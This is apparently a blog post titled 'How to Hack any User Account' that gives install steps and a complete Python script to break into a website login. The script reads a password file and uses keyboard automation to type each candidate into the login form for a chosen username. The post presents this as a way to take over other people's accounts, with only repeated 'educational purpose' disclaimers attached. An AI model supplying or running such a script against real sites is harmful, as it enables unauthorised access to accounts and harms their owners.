ComputerScienceWorld

How to Hack any User Account

By using Python


Brute Force Pic


***ONLY FOR EDUCATIONAL PURPOSE***


In the post, We will learn about How to Hack User account.

In the process, We Automatically Login to the link with user account.
    when we start it, the password list start action.
    It guess and enter - guess and enter one by one...

There are some simple command before start this attack...
1) Download & Install Python latest version (upper then 3.6) .
2) open any terminal (like : cmd, PowerShell, or any other)
3) type, pip install webbot and enter. browser helpe
4) type, pip install pynput and enter, auto-typing module
    type, pip install webdriver || if chromedriver problem
    type, pip install random || if random module occur error 

also have a password list to make it attackable.

if you have no password list go to my password list page,
or if you have password list save it as psswd.txt extension.
and place the file where the bruteforce.py

Okay!!! all are Done

  • First of all, Enter the link of the website where the user is.
  • Then, Enter the Username Which you Find, enter

take a cup of tea or coffee and hold till it over.
if page is open before page time out. you are lucky Enjoy
else try it after end of time out limit

***ONLY FOR EDUCATIONAL PURPOSE***


from webbot import Browser
from selenium import webdriver
from pynput.keyboard import Key, Controller
import time

webpage = input("Enter website link : ")
usern = input("Enter Your User-Name or Email : ")
attackfile = open('psswd.txt','r')

# web = webdriver.Chrome() # if chrome driver error
kboard = Controller()
web = Browser()

web.go_to(webpage)
time.sleep(5)
kboard.press(Key.f6)
kboard.release(Key.f6)
time.sleep(5)
kboard.press(Key.enter)
kboard.release(Key.enter)
time.sleep(5)
kboard.press(Key.tab)
kboard.release(Key.tab)
time.sleep(5)
kboard.type(usern)
kboard.press(Key.tab)
kboard.release(Key.tab)
time.sleep(5)
for brute in attackfile:
    kboard.type(brute)
    kboard.press(Key.enter)
    kboard.release(Key.enter)
    time.sleep(0.5)
    with kboard.pressed(Key.ctrl):
        kboard.press(Key.backspace)
        time.sleep(0.5)
        kboard.release(Key.backspace)

# Be secure

***ONLY FOR EDUCATIONAL PURPOSE***




If you have any doubt or query:

Visit to my Page:
Facebook : https://www.facebook.com/piyush.baghel.7583/